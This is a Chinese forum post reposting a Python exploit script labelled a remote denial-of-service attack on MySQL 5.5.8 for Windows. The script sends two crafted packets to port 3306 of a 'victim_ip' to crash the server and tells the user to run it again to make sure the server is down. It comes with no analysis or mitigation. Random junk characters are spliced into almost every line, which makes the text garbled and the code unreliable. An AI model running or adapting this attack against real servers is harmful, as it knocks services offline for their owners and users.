最近看过此主题的会员

返回列表 发帖
MySQL 5.5.8 远程拒绝服务漏洞
import socket, sys
+ h% M+ M- m# ?6 @. C
& g0 S9 E4 n9 J3 x5 Xprint "! I  z5 T7 x8 m: L+ B
"
! V; Q! C8 n2 }4 d  _9 Rprint "----------------------------------------------------------------"! M, m$ x& e; H8 q& Y6 k/ p
print "| MySQL 5.5.8 Null Ptr (windows)                                |"
6 X1 }8 J3 y% e; f+ ~# H9 {# Sprint "| Level Smash the Stack                                         |"; |' o# @# d8 v
print "----------------------------------------------------------------"
# e# G3 g* n; `/ H5 Kprint "! s7 |8 C- L* `" D1 g) ]9 k9 }
"
4 F% @# m* d; J " K2 J8 ^* O, E8 @" A" ?' R7 p
buf=("&x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"
+ Q2 v5 W9 }! `* x5 ["x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")
* X" P. ^6 }% ` 8 f/ Q7 n) n* ]% n
buf2=("x11x00x00x00x03set autocommit30")+ e! c# u9 X& j

0 m  l$ f1 |2 B7 Tdef usage():
# m+ ^) x$ k4 z, d) Yprint "usage : ./mysql.py <victim_ip>"& y1 J. l( x6 F- X
print "example: ./mysql.py 192.168.1.22"6 f* f1 n/ u) g0 }- A+ F

0 a4 f' C; ~5 p- h   l& T5 v* t5 W, f2 L7 f# R7 O! S' h' N
def main():$ O) A9 b3 y2 F4 H$ _& P
if len(sys.argv) != 2:2 p/ G3 M" `$ Z% E1 K
usage()
( N# _- y$ K2 n: ]. r+ n/ ^- a5 Esys.exit(); Y) p: e8 z' \$ ^
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)6 A# U6 S4 B- }- W+ R0 s6 e
, D& M2 _2 @* O( S6 e
HOST = sys.argv[1]+ m# V) F$ G' I: y, ?' v- a. ], c
PORT = int(3306)' g" H4 J4 }* Z0 W0 [& F
s.connect((HOST,PORT))
7 |  f8 w  x, U( Hprint "
  • Connect"
      H, ^" u) e! ~( v4 _# x( es.send(buf)  ^4 H" _% p0 N- x
    print "
  • Payload 1 sent"
    % [5 n+ h& s7 y/ C, U* r; |5 Is.send(buf2)# z7 t* a8 W" s" ?7 ^& J4 ]
    print "
  • Payload 2 sent. {4 l8 N; y$ i7 F1 \  Y
    ", "
  • Run again to ensure it is down..
    ; d# D$ H# o) Y"
    ! l5 @  H' ^' m) y3 `* u1 Ms.close()
      H: x4 c* u7 S% |6 `% s$ U) D
    9 @. K* k* H6 T8 R" Gif __name__ == "__main__":
    ( l1 u9 z2 a5 |2 E4 hmain()( G3 X% n+ u+ \9 J
      K3 Z, V# d  b% Y& m  c& V0 T. k! p
    6 F& I; {: E, \; h3 q. q& i

    " }: w. V( z' M! y( O5 a% Z% |4 \7 e# j0 R# u. N0 h" {- z

      P0 e3 l& i4 i# r  G/ x2 p
    & q" g8 o9 u1 H" \$ ]
    1 Y  _( M$ h! T" l! a1 ~5 {+ w" ~4 G3 ]

    4 g6 c4 p- Z7 Q3 N* `) F8 o2 W0 M( h/ E4 ]1 v& m

    & `2 \+ r' F8 W9 F1 h( e! p2 A' n# j1 Q) v! g
    ! F3 [$ x6 e* o8 ^, D2 j. V
      r. V, W. g+ M7 w5 |8 H. t' S% A
    - v2 |8 a/ b: ?; B6 v
    1 w: I- u% Q+ v! y$ ~, K9 a# D1 R) n
    5 x0 a$ M: A7 b

    8 O1 p* Y: T; L8 V( t) a( \公告:https://www.sitedirsec.com公布最新漏洞,请关注
  •  

    您可能还想看的主题:

    启明星辰招聘

    TOP

    返回列表